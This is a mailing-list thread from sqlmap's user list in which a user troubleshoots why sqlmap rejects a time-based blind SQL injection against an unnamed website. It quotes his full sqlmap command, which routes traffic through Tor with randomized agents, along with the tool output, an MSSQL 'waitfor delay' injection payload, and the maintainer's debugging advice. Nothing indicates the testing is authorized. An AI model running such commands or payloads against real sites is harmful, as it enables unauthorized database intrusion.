Wouldn't it be a bad idea trying to do a time based attack over Tor? Robin
On 8 December 2014 at 11:00, Miroslav Stampar <miroslav.stam...@gmail.com> wrote: > Hi. > > 1) Shouldn't "waitfor delay '0:0:0'" make no delay? > 2) sqlmap says "false positive or unexploitable injection point detected". > Is there a possibility that the character > is filtered? > 3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries to use > in "false positive check" phase. Then you'll see what fails. > > Bye > > On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hooshman...@gmail.com> wrote: >> >> Hi, >> >> There is a website that vulnerable to SQL injection. I have checked and >> I'm sure there is blind sql injection vulnerability but the sqlmap could not >> find this. >> I tried this command: >> ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent >> --risk 3 --level 3 --technique=T --dbms="MsSQL" >> and the output was something like this: >> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase >> time-based blind' injectable >> [INFO] checking if the injection point on GET parameter 'search' is a >> false positive >> [WARNING] false positive or unexploitable injection point detected >> [WARNING] GET parameter 'search' is not injectable >> >> >> the "search" parameter is vulnerable to this payload: '); waitfor delay >> '0:0:0' -- >> >> Did I make a mistake or the sqlmap did not find that? >> >> Best Regards >> >> >> ------------------------------------------------------------------------------ >> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server >> from Actuate! Instantly Supercharge Your Business Reports and Dashboards >> with Interactivity, Sharing, Native Excel Exports, App Integration & more >> Get technology previously reserved for billion-dollar corporations, FREE >> >> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk >> _______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > > ------------------------------------------------------------------------------ > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > from Actuate! Instantly Supercharge Your Business Reports and Dashboards > with Interactivity, Sharing, Native Excel Exports, App Integration & more > Get technology previously reserved for billion-dollar corporations, FREE > http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > ------------------------------------------------------------------------------ Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server from Actuate! Instantly Supercharge Your Business Reports and Dashboards with Interactivity, Sharing, Native Excel Exports, App Integration & more Get technology previously reserved for billion-dollar corporations, FREE http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
